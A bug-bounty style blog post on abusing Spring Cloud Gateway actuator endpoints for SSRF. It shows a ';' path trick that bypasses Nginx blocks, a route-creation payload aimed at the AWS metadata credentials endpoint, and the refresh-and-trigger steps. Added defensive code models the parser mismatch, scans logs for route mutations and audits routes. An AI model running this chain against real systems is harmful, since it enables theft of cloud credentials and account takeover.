DEV Community

Blue Byte
SSRF via Spring Cloud Gateway

In bug bounty programs it is extremely common to find subdomains without a defined index that redirect to the default Spring framework error page (with or without a defined /error route).


It is also very common to find library (framework) routes, such as /actuator/gateway, that return 403 Forbidden because of a rule defined in Nginx (the SecLists repository has a good wordlist specific to Spring Boot applications).

Because HTTP path parsers disagree with one another, it is usually possible to bypass these controls simply by appending the character ';' (or the encoded '\x09'): in this specific case, Spring Boot in versions < 2.7 strips such characters from the path, while Nginx does not.

curl 'https://redacted/actuator;' | jq
{
  "_links": {
    "self": {
      "href": "http://redacted.com/actuator;",
      "templated": false
    },
    "gateway": {
      "href": "http://redacted.com/actuator;/gateway",
      "templated": false
    }
  }
}
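The following is an added example (not code from the original post) that models the parser disagreement just described: a front proxy matching the raw path with a boundary-aware deny rule, versus Spring resolving its lookup path after dropping ';...' path parameters from each segment. spring_lookup_path() is an approximation written for this example, not Spring's own code; naive_is_blocked(), hardened_is_blocked() and the sample paths are this example's own. The hardened check shows the defensive pattern: normalise the way the backend will, then match.

```python
# Added example, not code from the original post. Models the mismatch between
# a proxy's raw-path rule and Spring's lookup path (';...' removed per
# segment). spring_lookup_path() is an approximation for this example, not
# Spring's code.
import re
from urllib.parse import unquote

# Boundary-aware deny rule of the kind a proxy might carry: "/actuator" alone
# or "/actuator/...". "/actuator;" and "/actuator;/gateway" slip past it.
BLOCKED = re.compile(r"^/actuator(?:/|$)")


def naive_is_blocked(raw_path: str) -> bool:
    """Proxy-style check applied to the request path exactly as sent."""
    return BLOCKED.match(raw_path) is not None


def spring_lookup_path(raw_path: str) -> str:
    """Approximate the path Spring matches handlers against (assumption for
    this example): drop any query string, remove ';...' path parameters from
    every segment, then percent-decode what is left."""
    path = raw_path.split("?", 1)[0]
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return unquote("/".join(segments))


def hardened_is_blocked(raw_path: str) -> bool:
    """Same deny rule, but evaluated on the path the backend will actually
    use, so the two parsers can no longer disagree."""
    return BLOCKED.match(spring_lookup_path(raw_path)) is not None


def compare(raw_path: str) -> dict:
    """Show both verdicts side by side for one request path."""
    return {
        "raw": raw_path,
        "backend_sees": spring_lookup_path(raw_path),
        "naive_blocks": naive_is_blocked(raw_path),
        "hardened_blocks": hardened_is_blocked(raw_path),
    }


if __name__ == "__main__":
    for p in ("/actuator/gateway", "/actuator;", "/actuator;/gateway", "/api/users"):
        print(compare(p))
```

Normalising in the proxy only closes the gap for parsers it models correctly; the more robust fix is to not route actuator traffic through the public proxy at all, for example by restricting exposed endpoints with management.endpoints.web.exposure.include and binding management endpoints to a separate port with management.server.port (both standard Spring Boot properties), so the proxy never sees them.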

Spring Cloud Gateway is a service that forwards requests to other applications and returns their responses on the configured route. In other words, this functionality can be abused for SSRF, and, if the server is hosted on a cloud provider, it may be possible to reach the metadata service and obtain temporary access credentials. Often, routes can be created by sending a POST request to /actuator;/gateway/routes/{route_id} with the following body:

{
  "id": "first",
  "predicates": [{
    "name": "Path",
    "args": {"_genkey_0":"/first"}
  }],
  "filters": [
      "StripPrefix=2"
  ],
  "uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials",
  "order": 0
}

After creating the route, the route cache must be refreshed by sending a POST (yes, POST) request to /actuator;/gateway/refresh; the response to that request has no body. From then on, the SSRF is triggered simply by requesting the /first route.
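The following is an added example (not code from the original post) showing two defender-side checks for the route creation and refresh procedure above: a scan of proxy access logs for actuator requests whose normalised path differs from the raw one and for POSTs that mutate gateway routes, and an audit of stored route definitions whose uri points at a link-local, loopback or private address (the metadata endpoint in the post's route body is link-local). The log lines are constructed for this example in Nginx "combined" format; parse_access_line(), flag_request(), scan_log() and audit_route() are this example's own names.

```python
# Added example, not code from the original post. (1) Scan constructed
# access-log lines for actuator normalisation mismatches and gateway route
# mutations; (2) audit route definitions for URIs aimed at internal IPs.
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Nginx "combined" format: src - user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ROUTE_MUTATION = re.compile(r"/gateway/(?:routes/|refresh$)")


def normalize_path(raw_path: str) -> str:
    """Decode first, then drop ';...' from each segment: a deliberately
    broad normalisation for detection, not a model of any one parser."""
    path = unquote(raw_path.split("?", 1)[0])
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def flag_request(method: str, raw_path: str) -> list:
    """Return the reasons (possibly none) a single request is suspicious."""
    reasons = []
    norm = normalize_path(raw_path)
    if norm.startswith("/actuator") and norm != raw_path.split("?", 1)[0]:
        reasons.append("actuator path reached via normalisation mismatch")
    if method == "POST" and ROUTE_MUTATION.search(norm):
        reasons.append("gateway route mutation")
    return reasons


def parse_access_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines) -> list:
    """Return (src, method, raw_path, reasons) for every flagged line."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        reasons = flag_request(rec["method"], rec["path"])
        if reasons:
            hits.append((rec["src"], rec["method"], rec["path"], reasons))
    return hits


def audit_route(route: dict):
    """Return a finding if the route's uri host is a literal link-local,
    loopback or private IP, else None (hostnames are not resolved here)."""
    host = urlsplit(route.get("uri", "")).hostname
    if host is None:
        return None
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    if ip.is_link_local or ip.is_loopback or ip.is_private:
        return f"route {route.get('id')!r} forwards to internal address {ip}"
    return None


# Constructed sample log. The final GET /first is the SSRF trigger itself and
# looks ordinary, so the route-mutation POSTs are the usable signal.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /actuator/gateway HTTP/1.1" 403 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /actuator; HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "POST /actuator;/gateway/routes/first HTTP/1.1" 201 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "POST /actuator;/gateway/refresh HTTP/1.1" 200 0 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /first HTTP/1.1" 200 1340 "-" "curl/8.0"',
]

# The post's route body trimmed to id and uri, plus a constructed benign route.
METADATA_ROUTE = {"id": "first", "uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials"}
BENIGN_ROUTE = {"id": "orders", "uri": "http://orders.example.com/"}

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(audit_route(METADATA_ROUTE))
    print(audit_route(BENIGN_ROUTE))
```

The route audit can be run against the output of GET /actuator/gateway/routes on a gateway you own as a periodic control, since a route injected through the actuator persists until the next restart or refresh that drops it; the log scan is the signal to alert on, because the eventual request to the attacker-defined path is indistinguishable from normal traffic.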


In this way we would gain access to the AWS account and control over some of its resources.
